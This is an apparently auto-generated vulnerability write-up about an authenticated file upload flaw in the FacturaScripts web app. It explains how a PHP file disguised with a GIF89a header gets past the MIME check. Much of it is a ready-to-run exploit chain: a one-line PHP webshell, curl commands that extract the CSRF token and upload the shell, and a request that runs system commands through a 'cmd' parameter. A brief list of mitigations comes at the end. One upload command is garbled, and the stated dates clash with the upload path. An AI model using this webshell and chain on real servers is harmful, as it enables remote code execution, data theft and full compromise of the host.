Listen to this Post
How the mentioned CVE works:
The vulnerability exists in FacturaScripts product image upload. The `addImageAction()` method inside `ProductImagesTrait.php` validates uploaded files by checking if the MIME type contains the substring “image/”. An attacker with valid credentials can create a PHP file starting with `GIF89a` magic bytes, making the server detect it as image/gif. The code then moves the file using `getClientOriginalName()` preserving the original `.php` extension. The file is stored in the web‑accessible `/MyFiles/YYYY/MM/` directory with an auto‑incremented name. No further validation rejects executable extensions. Accessing the uploaded `.php` file via HTTP allows remote command execution using a `cmd` parameter. The flawed MIME check only verifies the presence of “image/”, which is easily bypassed. The `move()` function does not rename the file safely. Consequently, a disguised PHP script gets saved and executed on the server. This leads to full system compromise depending on permissions.
dailycve form:
Platform: FacturaScripts web app
Version: 2025.81 and below
Vulnerability: Authenticated unrestricted upload
Severity: Critical
Date: May 7 2026
Prediction: Expected patch June
What Undercode Say:
Analytics:
Create malicious file with GIF header echo -e 'GIF89a\n<?php system($_GET["cmd"]); ?>' > shell.jpg.php Extract CSRF token from edit page curl -s "http://target/EditProducto?code=CONTA621" -H "Cookie: PHPSESSID=YOUR_SESSION_ID" | grep -o 'multireqtoken" value="[^"]"' | cut -d'"' -f4 Upload the disguised PHP file curl -X POST "http://target/EditProducto?code=CONTA621" \ -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \ -F "multireqtoken=YOUR_CSRF_TOKEN" \ -F "action=add-image" \ -F "activetab=EditProductoImagen" \ -F "idproducto=3" \ -F "newfiles[][email protected]" Execute arbitrary commands curl "http://target/MyFiles/2026/03/2.php?cmd=id"
Exploit:
Authenticate to FacturaScripts, obtain a CSRF token, then upload a `.php` file with `GIF89a` header. The server stores it as `.php` in a predictable path. Directly call the uploaded file with `?cmd=` to execute system commands.
Protection from this CVE:
Reject any uploaded filename ending with .php, .phtml, or .phar. Generate a random UUID filename and use `finfo` to validate real content. Store uploads outside the web root and serve them via a secure controller. Never trust getClientOriginalName().
Impact:
An authenticated attacker can execute arbitrary PHP code on the server, leading to data theft, defacement, persistence, and potential total compromise of the hosting environment.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
